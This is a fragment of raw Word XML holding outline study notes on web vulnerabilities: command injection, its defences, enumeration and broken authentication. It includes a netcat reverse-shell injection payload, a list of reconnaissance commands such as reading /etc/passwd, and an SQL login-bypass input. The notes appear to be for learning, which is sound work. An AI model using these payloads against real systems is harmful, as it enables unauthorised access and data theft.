    <w:p w14:paraId="3752BE3C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Execute arbitrary system commands on a server to gain access to user systems. Enable them to steal sensitive data and carry out attacks against infrastructure linked to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C58D431" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The main defense is ensuring user-controlled input is not interpreted as queries or commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1582E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Using an allow list – safe inputs or characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830CAA1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Stripping input – dangerous characters are removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA6E4F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>OS Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6B526" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Occurs when server-side code, such as PHP, in a web application makes a system call on the hosting machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12205497" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Allows attacker to take advantage of made system call to execute OS commands on server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59D9FA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Spawn reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C43B4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>;nc -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208E4235" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Active Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EC1CD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Blind command injection occurs when the system command made to server does not return response to user in HTML document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD8114" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Active command injection will return the response to the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3DD188" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Made visible through several HTML elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C0C26" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>A sample code would check is a command string is set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8ADB0F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If it is set, then the variable of the command string is passed to the input field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73028C56" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Using the passthru() function, the code executes what gets entered into the input then passing output directly back to browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CEC0CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If it isn’t set, error is output to the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC707D5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>WAYS TO DETECT ACTIVE COMMAND INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0784594A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>See response from system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62165D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Passthru() function in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00ED9C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Response passed directly to document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A87561" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Can be used to enumerate machine further</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ABDFE3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Commands to try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8AC2E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B23AB3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Whoami – user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82C4A2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cat /etc/passwd – user list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BE725E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cross reference with whoami output to determine user shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3628D6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9656B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ifconfig/ip addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0844A53F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C842087" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ps -ef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0AF31" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD9D9A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Lsb_release -a – find OS version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883FCA0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F849B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790EF929" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E798557" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD46BB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Tasklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F2B87" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Netstat -an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885D1B4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Broken Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAC34E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Authentication and session management constitute core components of modern web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB343CE" w14:textId="30D489A9" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1D42F" w14:textId="53D71A79" w:rsidR="009A07DA" w:rsidRPr="00F512ED" w:rsidRDefault="009A07DA" w:rsidP="009A07DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. admin’--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CFFB8" w14:textId="17959910" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611DA824" w14:textId="25086B4A" w:rsidR="009A07DA" w:rsidRDefault="009A07DA" w:rsidP="009A07DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data from query could be stored in session cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F08CF6C" w14:textId="02266FFD" w:rsidR="009A07DA" w:rsidRDefault="009A07DA" w:rsidP="009A07DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>extract session cookie in Developer Tools &gt; Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2DC28" w14:textId="49200D79" w:rsidR="009A07DA" w:rsidRDefault="009A07DA" w:rsidP="009A07DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>decode cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB1C31B" w14:textId="01CCD960" w:rsidR="009A07DA" w:rsidRPr="001352F0" w:rsidRDefault="007A6E65" w:rsidP="009A07DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId63" w:history="1">
